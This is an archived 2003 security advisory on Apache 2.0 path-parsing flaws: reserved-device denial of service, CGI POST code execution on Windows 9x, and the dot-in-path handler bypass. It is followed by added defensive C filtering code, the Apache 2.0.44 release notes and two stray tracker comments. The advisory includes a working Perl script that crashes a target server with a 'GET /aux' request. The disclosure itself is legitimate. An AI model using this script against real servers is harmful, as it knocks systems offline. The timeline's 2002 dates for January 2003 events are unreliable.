Path Parsing Errata in Apache HTTP Server

From: "mattmurphy@kc.rr.com" <mattmurphy@kc.rr.com>
To: vulnwatch@vulnwatch.org, news@securiteam.com, bugtraq@securityfocus.com
Date: 2003-01-22 15.48

Original Message:
-----------------
From: mattmurphy@kc.rr.com <mattmurphy@kc.rr.com>
Date: Wed, 22 Jan 2003 09:00:58 -0500
To: full-disclosure@lists.netsys.com
Subject: Path Parsing Errata in Apache HTTP Server

Path Parsing Errata in Apache HTTP Server

ABSTRACT

The Apache HTTP Server <http://httpd.apache.org/> powers a whopping two thirds of all internet web sites, offering such powerful features as SSI, pre-forked and multi-threaded MPMs, input and output filtering, advanced logging, dynamic actions, dynamic modules, reverse DNS, virtual hosting, and even SSL via a fully extensible interface. It operates on an incredible number of platforms, including nearly all major Unix variants, Novell Netware and Microsoft Windows; Apache has also been ported to cygwin.

DESCRIPTION

The Apache HTTP Server contains several flaws related to its path mapping routines that could enable an attacker to cause Apache to handle files incorrectly, cause a system-wide denial of service, or possibly execute arbitrary code.

ANALYSIS

Issue 1 (VU#979793):

Exploitation of this condition leads to a remote denial of service against a Windows 9x system running Apache, and appears to be due to erroneous checks in the ap_directory_walk function. A denial of service can be caused with a web browser by requesting a reserved device such as "aux":

--- Apache2-nuke.pl ---
#!/usr/bin/perl
use IO::Socket;

if (@ARGV < 1 || @ARGV > 2) {
    print STDOUT "Usage: perl $0 <host> <port=80>\n";
    exit;
}

if (@ARGV == 2) {
    $port = $ARGV[1];
} else {
    $port = 80;
}

$f = IO::Socket::INET->new(Proto    => "tcp",
                           PeerHost => $ARGV[0],
                           PeerPort => $port);

print $f "GET /aux HTTP/1.0\r\n\r\n";
--- Apache2-nuke.pl ---

The Apache 2.0.44 release announcement incorrectly states that previous Microsoft patches eliminate this vulnerability. There are some devices on Windows platforms that will hang the system if opened with certain file permissions masks.

Issue 2 (VU#825177):

Exploitation of this condition leads to a remote compromise. This issue is also restricted to Windows 9x versions of Apache, and has the same underlying cause as the previously noted denial of service condition. It is related to CGI input redirection. Specifically, when POSTing to a CGI, the stdin stream points to the input form data. By sending a POST to "con.xxx" in a ScriptAlias'ed directory, your POST data *may* be executed by that interpreter.

Issue 3 (VU#384033):

Exploitation of this condition could lead to bypass of default script mapping behavior. This flaw impacts Apache on all platforms. This issue is best described with an example:

http://localhost/folder.php/file

Apache should parse 'file' as plain text -- that is, simply returning it to the browser. However, an incorrect check in Apache's mapping algorithms causes the 'php' extension to be associated with this request. Rather than checking only the file's extension, Apache checks for extensions in any path member, stopping at the first.

This is more of a weakness than a vulnerability, as exploitation only yields UID nobody if you allow uploading under the docroot *and* filter by filename only, in which case you have far more serious concerns than the exploitation of this issue.

DETECTION

These issues are believed to be specific to the 2.0 branch; Apache 1.3.27 (and all other 1.x versions) are believed immune from these issues. Apache 2.0.43 and prior should be upgraded to the 2.0.44 release, which will be available from <http://httpd.apache.org/dist/httpd>.

WORKAROUNDS

* I recommend that servers running Windows 9x be upgraded to a production environment (Windows NT, 2000, or XP, for example). This offers a solution to VU#979793 and VU#825177.

* A configuration workaround is available for VU#384033. For any directories allowing uploads, add the following lines:

<Directory "/var/apache/htdocs/uploads/">
    AllowOverride None
    Options -Includes -ExecCGI
    SetHandler default-handler
</Directory>

* All sites running Apache 2.0.43 and prior should be upgraded to 2.0.44 if impacted by these issues.

DISCLOSURE TIMELINE

December 4, 2002: security@apache.org notified
December 5, 2002: Confirmation response received from William Rowe, Jr. (wrowe@rowe-clan.net); auditing begins.
December 5, 2002: cert@cert.org contacted
December 5, 2002: Automated response from CERT/CC incident response.
December 9, 2002: Follow-up received from William Rowe, Jr. indicates that cause of reserved device issue has been identified.
December 10, 2002: Initial patch binaries received from William Rowe, Jr. (libapr.dll and libhttpd.dll). Fix for reserved device flaw confirmed, but dot-in-path attack remains.
December 10, 2002: CERT/CC response received from Chad Dougherty; vulnerability IDs are assigned.
December 10, 2002: Reply to Chad Dougherty indicating that precise details of VU#825177 will not be immediately disclosed.
December 10, 2002: Reply to William Rowe, Jr. requesting confirmation of status and receipt of VU#384033.
December 10/11, 2002: Series of e-mail communications to clarify the impacts/origins of VU#384033; source of issue is identified.
January 20, 2002: Apache 2.0.44 released
January 22, 2002: Public disclosure

--------------------------------------------------------------------
mail2web - Check your email from the web at http://mail2web.com/ .
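The two path-parsing checks the advisory above turns on, written out as an added example that is neither Murphy's code nor Apache's: a filter that rejects any URL path segment naming an MS-DOS reserved device (Issues 1 and 2, the "aux" and "con.xxx" cases), and, for Issue 3, the weak rule of taking the first extension found in any path member beside the safer rule of looking only at the final segment. The function names, the sample paths and the device list (the CON/PRN/AUX/NUL and COM1-9/LPT1-9 set Windows reserves) are my own choices, not identifiers from the advisory or from httpd.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example, not Apache's code: two defensive path checks for the
 * classes of flaw described in the advisory. Function names are mine. */

/* MS-DOS device names that Windows resolves in any directory and with any
 * extension ("aux", "con.xxx", "/cgi-bin/aux.pl" all reach the device). */
static const char *const reserved_devices[] = {
    "CON", "PRN", "AUX", "NUL",
    "COM1", "COM2", "COM3", "COM4", "COM5", "COM6", "COM7", "COM8", "COM9",
    "LPT1", "LPT2", "LPT3", "LPT4", "LPT5", "LPT6", "LPT7", "LPT8", "LPT9",
    NULL
};

/* Case-insensitive: does s[0..n) equal the whole keyword kw? */
static int ieq_n(const char *s, size_t n, const char *kw)
{
    size_t i;
    for (i = 0; i < n; i++) {
        if (kw[i] == '\0' || toupper((unsigned char)s[i]) != (unsigned char)kw[i])
            return 0;
    }
    return kw[n] == '\0';
}

/* Copy n bytes of s into out as a NUL-terminated string, truncating if needed. */
static void copy_n(char *out, size_t outsz, const char *s, size_t n)
{
    if (n >= outsz)
        n = outsz - 1;
    memcpy(out, s, n);
    out[n] = '\0';
}

/* Issues 1 and 2: return 1 if any '/'-separated segment of path, with its
 * extension and trailing spaces stripped, is a reserved device name. Every
 * segment is checked because the device is opened wherever it appears in
 * the path, not only as the final component. */
int has_reserved_device(const char *path)
{
    const char *seg = path;
    while (*seg) {
        const char *end = strchr(seg, '/');
        size_t seglen = end ? (size_t)(end - seg) : strlen(seg);
        size_t base = 0;
        while (base < seglen && seg[base] != '.')   /* base name stops at the first dot */
            base++;
        while (base > 0 && seg[base - 1] == ' ')    /* Windows ignores trailing spaces */
            base--;
        for (int i = 0; reserved_devices[i]; i++)
            if (ieq_n(seg, base, reserved_devices[i]))
                return 1;
        if (!end)
            break;
        seg = end + 1;
    }
    return 0;
}

/* Issue 3, the behaviour the advisory describes: scan segments from the left
 * and take the first extension seen, so "/folder.php/file" yields "php".
 * Returns 1 and fills out when an extension is found, else 0. */
int first_extension_in_path(const char *path, char *out, size_t outsz)
{
    const char *seg = path;
    while (*seg) {
        const char *end = strchr(seg, '/');
        size_t seglen = end ? (size_t)(end - seg) : strlen(seg);
        const char *dot = memchr(seg, '.', seglen);
        if (dot && (size_t)(dot - seg) + 1 < seglen) {
            copy_n(out, outsz, dot + 1, seglen - (size_t)(dot - seg) - 1);
            return 1;
        }
        if (!end)
            break;
        seg = end + 1;
    }
    out[0] = '\0';
    return 0;
}

/* Issue 3, the safer rule: only the final segment's last extension decides
 * the handler, so "/folder.php/file" has no extension and is served as-is. */
int final_segment_extension(const char *path, char *out, size_t outsz)
{
    const char *slash = strrchr(path, '/');
    const char *seg = slash ? slash + 1 : path;
    const char *dot = strrchr(seg, '.');
    if (!dot || dot[1] == '\0') {
        out[0] = '\0';
        return 0;
    }
    copy_n(out, outsz, dot + 1, strlen(dot + 1));
    return 1;
}

int main(void)
{
    /* Constructed sample request paths, including the advisory's "/aux",
     * "con.xxx" and "/folder.php/file". */
    const char *paths[] = { "/aux", "/cgi-bin/con.xxx", "/auxiliary/readme.txt",
                            "/folder.php/file", "/docs/readme.txt", "/COM1" };
    char weak[32], safe[32];
    for (size_t i = 0; i < sizeof paths / sizeof paths[0]; i++) {
        first_extension_in_path(paths[i], weak, sizeof weak);
        final_segment_extension(paths[i], safe, sizeof safe);
        printf("%-24s device=%d first_ext=%-4s final_ext=%s\n", paths[i],
               has_reserved_device(paths[i]), weak, safe);
    }
    return 0;
}
```

The device check deliberately compares the base name before the first dot, which is what makes "con.xxx" in a ScriptAlias'ed directory match; "auxiliary" and "com10" do not, because the comparison requires the whole keyword. Rejecting such a request early, before any file open, is the mitigation the 2.0.44 announcement describes as filtering MS-DOS device names.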
[ANNOUNCE] Apache 2.0.44 Released

From: Lars Eilebrecht <lars@apache.org> (The Apache Software Foundation)
To: bugtraq@securityfocus.com
Date: 2003-01-23 00.41

-----BEGIN PGP SIGNED MESSAGE-----

The Apache Software Foundation and The Apache HTTP Server Project are pleased to announce the seventh public release of the Apache 2.0 HTTP Server. This Announcement notes the significant changes in 2.0.44 as compared to 2.0.43.

This version of Apache is principally a security and bug fix release. A summary of the bug fixes is given at the end of this document. Of particular note is that 2.0.44 addresses three security vulnerabilities affecting the Windows platform.

VU#979793

Versions of Windows 9x and Me could be crashed by a malicious request to Apache that contains a MS-DOS device name. This is a known security issue in Microsoft Windows for which a fix is available:

http://www.microsoft.com/technet/Security/Bulletin/ms00-017.asp

Apache 2.0.44 has also been patched to correctly filter MS-DOS device names preventing the crash even if the Microsoft update is not applied (cve.mitre.org: CAN-2003-0016 [1]).

VU#825177

As a consequence of VU#979793, a remote attacker can run arbitrary code on a server running Apache under Windows 9x and Me by sending a carefully crafted POST request containing a MS-DOS device name (cve.mitre.org: CAN-2003-0016 [1]).

On Windows platforms Apache could be forced to serve unexpected files by appending illegal characters such as '<' to the request URL (cve.mitre.org: CAN-2003-0017 [2]).

The Apache Software Foundation would like to thank Matthew Murphy and Lionel Brits for the responsible reporting of these issues.

The 2.0.44 release marks a change in the Apache release process and a new level of stability in the 2.0 series. Beginning with this release, we will make every effort to retain forward compatibility in the configuration and module API, so that upgrading along the 2.0 series should be much easier. This compatibility extends backwards to 2.0.42, so users of that version or later should be able to upgrade without changing configurations or updating DSO modules. (Users of earlier releases will need to recompile all modules in order to upgrade to 2.0.44.)

We consider this release to be the best version of Apache available and encourage users of all prior versions to upgrade.

Apache 2.0.44 is available for download from

http://httpd.apache.org/download.cgi

Please see the CHANGES_2.0 file, linked from the above page, for a full list of changes.

Apache 2.0 offers numerous enhancements, improvements, and performance boosts over the 1.3 codebase. For an overview of new features introduced after 1.3 please see

http://httpd.apache.org/docs-2.0/new_features_2_0.html

When upgrading or installing this version of Apache, please keep in mind the following: If you intend to use Apache with one of the threaded MPMs, you must ensure that the modules (and the libraries they depend on) that you will be using are thread-safe. Please contact the vendors of these modules to obtain this information.

Apache 2.0.44 Major changes

Security vulnerabilities closed since Apache 2.0.43

*) Fixed the security vulnerability noted in VU#979793: Apache vulnerable to DoS via request for MS-DOS device on Windows 9x and Me.

*) Fixed the security vulnerability noted in VU#825177: Apache allows arbitrary code execution via crafted POST request containing MS-DOS device name on Windows 9x and Me.

*) Fix CAN-2002-0017: On Windows platforms Apache could be forced to serve unexpected files by appending illegal characters such as '<' to the request URL.

Bugs fixed and features added since Apache 2.0.43

*) mod_autoindex: Bring forward the IndexOptions IgnoreCase option from Apache 1.3. PR 14276 [David Shane Holden <dpejesh@yahoo.com>, William Rowe]

*) mod_mime: Workaround to prevent a segfault if r->filename=NULL [Brian Pane]

*) Reorder the definitions for mod_ldap and mod_auth_ldap within config.m4 to make sure the parent mod_ldap is defined first. This ensures that mod_ldap comes before mod_auth_ldap in the httpd.conf file, which is necessary for mod_auth_ldap to load. PR 14256 [Graham Leggett]

*) Fix the building of cgi command lines when the query string contains '='. PR 13914 [Ville Skyttä <ville.skytta@iki.fi>, Jeff Trawick]

*) Rename CacheMaxStreamingBuffer to MCacheMaxStreamingBuffer. Move implementation of MCacheMaxStreamingBuffer from mod_cache to mod_mem_cache. MCacheMaxStreamingBuffer now defaults to the lesser of 100,000 bytes or MCacheMaxCacheObjectSize. This should eliminate the need for explicitly coding MCacheMaxStreamingBuffer in most configurations. [Bill Stoddard]

*) Replace APU_HAS_LDAPSSL_CLIENT_INIT with APU_HAS_LDAP_NETSCAPE_SSL as set by apr-util in util_ldap.c. This should allow mod_ldap to work with the Netscape/Mozilla LDAP library. [Øyvin Sømme <somme@oslo.westerngeco.slb.com>, Graham Leggett]

*) Fix critical bug in new --enable-v4-mapped configure option implementation which broke IPv4 listening sockets on some systems. [hiroyuki hanai <hanai@imgsrc.co.jp>]

*) mod_setenvif: Fix BrowserMatchNoCase support for non-regex patterns [André Malo <nd@perlig.de>]

*) Add version string to provider API. [Justin Erenkrantz]

*) mod_negotiation: Set the appropriate mime response headers (Content-Type, charset, Content-Language and Content-Encoding) for negotiated type-map "Body:" responses (such as the error pages.) [André Malo <nd@perlig.de>]

*) mod_log_config: Allow '%%' escaping in CustomLog format strings to insert a literal, single '%'. [André Malo <nd@perlig.de>]

*) mod_autoindex: AddDescription directives for directories now work as in Apache 1.3, where no trailing '/' is specified on the directory name. Previously, the trailing '/' *had* to be specified, which was incompatible with Apache 1.3. PR 7990 [Jeff Trawick]

*) Fix for PR 14556. The expiry calculations in mod_cache were trying to perform "now + ((date - lastmod) * factor)" where date == lastmod resulting in "now + 0". The code now follows the else path (using the default expiration) if date is equal to lastmod. [rx@armstrike.com (Sergey), Paul J. Reder]

*) Use AP_DECLARE in the debug versions of ap_strXXX in case the default calling convention is not the same as the one used by AP_DECLARE. [Juan Rivera <Juan.Rivera@citrix.com>]

*) mod_cache: Don't cache response header fields designated as hop-by-hop headers in HTTP/1.1 (RFC 2616 Section 13.5.1). [Estrade Matthieu <estrade-m@ifrance.com>, Brian Pane]

*) mod_cgid: Handle environment variables containing newlines. PR 14550 [Piotr Czejkowski <apache@czarny.eu.org>, Jeff Trawick]

*) Move mod_ext_filter out of experimental and into filters. [Jeff Trawick]

*) Fixed a memory leak in mod_deflate with dynamic content. PR 14321 [Ken Franken <kfranken@decisionmark.com>]

*) Add --[enable|disable]-v4-mapped configure option to control whether or not Apache expects to handle IPv4 connections on IPv6 listening sockets. Either setting will work on systems with the IPV6_V6ONLY socket option. --enable-v4-mapped must be used on systems that always allow IPv4 connections on IPv6 listening sockets. PR 14037 (Bugzilla), PR 7492 (Gnats) [Jeff Trawick]

*) This fixes a problem where the underlying cache code indicated that there was one more element on the cache than there actually was. This happened since element 0 exists but is not used. This code allocates the correct number of useable elements and reports the number of actually used elements. The previous code only allowed MCacheMaxObjectCount-1 objects to be stored in the cache. [Paul J. Reder]

*) mod_setenvif: Add SERVER_ADDR special keyword to allow envariable setting according to the server IP address which received the request. [Ken Coar]

*) mod_cgid: Terminate CGI scripts when the client connection drops. PR 8388 [Jeff Trawick]

*) Rearrange OpenSSL engine initialization to support RAND redirection on crypto accelerator. [Frederic DONNAT <frederic.donnat@zencod.com>]

*) Always emit Vary header if mod_deflate is involved in the request. [Andre Malo <nd@perlig.de>]

*) mod_isapi: Stop unsetting the 'empty' query string result with a NULL argument in ecb->lpszQueryString, eliminating segfaults for some ISAPI modules. PR 14399 [Detlev Vendt <detlev.vendt@brillit.de>]

*) mod_isapi: Fix an issue where the HSE_REQ_DONE_WITH_SESSION notification is received before the HttpExtensionProc() returns HSE_STATUS_PENDING. This only affected isapi .dll's configured with the ISAPIFakeAsync on directive. PR 11918 [John DeSetto <jdesetto@radiantsystems.com>, William Rowe]

*) mod_isapi: Fix the issue where all results from mod_isapi would run through the core die handler resulting in invalid responses or access log entries. PR 10216 [William Rowe]

*) Improves the user friendliness of the CacheRoot processing over my last pass. This version avoids the pool allocations but doesn't avoid all of the runtime checks. It no longer terminates during post-config processing. An error is logged once per worker, indicating that the CacheRoot needs to be set. [Paul J. Reder]

*) Fix a bug where we keep files open until the end of a keepalive connection, which can result in:
   (24)Too many open files: file permissions deny server access
   especially on threaded servers. [Greg Ames, Jeff Trawick]

*) Fix a bug in which mod_proxy sent an invalid Content-Length when a proxied URL was invoked as a server-side include within a page generated in response to a form POST. [Brian Pane]

*) Added code to process min and max file size directives and to init the expirychk flag in mod_disk_cache. Added a clarifying comment to cache_util. [Paul J. Reder]

*) The value emitted by ServerSignature now mimics the Server HTTP header as controlled by ServerTokens. [Francis Daly <deva@daoine.org>]

*) Gracefully handle retry situations in the SSL input filter, by following the SSL libraries' retry semantics. [William Rowe]

*) Terminate CGI scripts when the client connection drops. This fix only applies to some normal paths in mod_cgi. mod_cgid is still busted. PR 8388 [Jeff Trawick]

*) Fix a bug where 416 "Range not satisfiable" was being returned for content that should have been redirected. [Greg Ames]

*) Fix memory leak in mod_ssl from internal SSL library allocations within SSL_get_peer_certificate and X509_get_pubkey. [Zvi Har'El <rl@math.technion.ac.il>, Madhusudan Mathihalli <madhusudan_mathihalli@hp.com>]

*) mod_ssl uses free() inappropriately in several places, to free memory which has been previously allocated inside OpenSSL. Such memory should be freed with OPENSSL_free(), not with free(). [Nadav Har'El <nyh@math.technion.ac.il>, Madhusudan Mathihalli <madhusudan_mathihalli@hp.com>]

*) Emit a message to the error log when we return 404 because the URI contained '%2f'. (This was previously nastily silent and difficult to debug.) [Ken Coar]

*) Fix streaming output from an nph- CGI script. CGI:IRC now works. PR 8482 [Jeff Trawick]

*) More accurate logging of bytes sent in mod_logio when the client terminates the connection before the response is completely sent [Bojan Smojver <bojan@rexursive.com>]

*) Fix some problems in the perchild MPM. [Jonas Eriksson <jonas@webkonsulterna.com>]

*) Change the CacheRoot processing to check for a required value at config time. This saves a lot of wasted processing if the mod_disk_cache module is loaded but no CacheRoot was provided. This fix also adds code to log an error and avoid useless pallocs and processing when the computed cache file name cannot be opened. This also updates the docs accordingly. [Paul J. Reder]

*) Introduce the EnableSendfile directive, allowing users of NFS shares to disable sendfile mechanics when they either fail outright or provide intermittently corrupted data. PR [William Rowe]

*) Resolve the error "An operation was attempted on something that is not a socket. : winnt_accept: AcceptEx failed. Attempting to recover." for users of various firewall and anti-virus software on Windows. PR 8325 [William Rowe]

*) Add the ProxyBadHeader directive, which gives the admin some control on how mod_proxy should handle bogus HTTP headers from proxied servers. This allows 2.0 to "emulate" 1.3's behavior if desired. [Jim Jagielski]

*) Change the LDAP modules to export their symbols correctly during a Windows build. Add dsp files for Windows. Update README.ldap file for Windows build instructions. [Andre Schild <A.Schild@aarboard.ch>]

*) Performance improvements for the code that generates HTTP response headers [Brian Pane]

*) Add -S as a synonym for -t -DDUMP_VHOSTS. [Thom May <thom@planetarytramp.net>]

*) Fix a bug with dbm rewrite maps which caused the wrong value to be used when the key was not found in the dbm. PR 13204 [Jeff Trawick]

*) Fix a problem with streaming script output and mod_cgid. [Jeff Trawick]

*) Add ap_register_provider/ap_lookup_provider API. [John K. Sterling <john@sterls.com>, Justin Erenkrantz]

References

[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0016
[2] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2003-0017

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iQCSAwUBPi8sLD6Pt/L4g0HZAQGLvwPkDkm8STOrBrER006N1XA+yIulDYCu7RC+
eOyqM8L9mV8VWn3WnJEcew5O6h3YVawKjP5glpvnYewZnDC0/YaouvW/i1kWx+Nq
5xj7GDVIKkCi8LPTfpJiLQjZ8V3SkRNAm26piipHbPP1mm2ytYvbAmAuOclo68HL
cOoYyME=
=e6Yn
-----END PGP SIGNATURE-----
apache-2.0.44 is already in the tree. please close this.
like i said -- already in the tree, dude.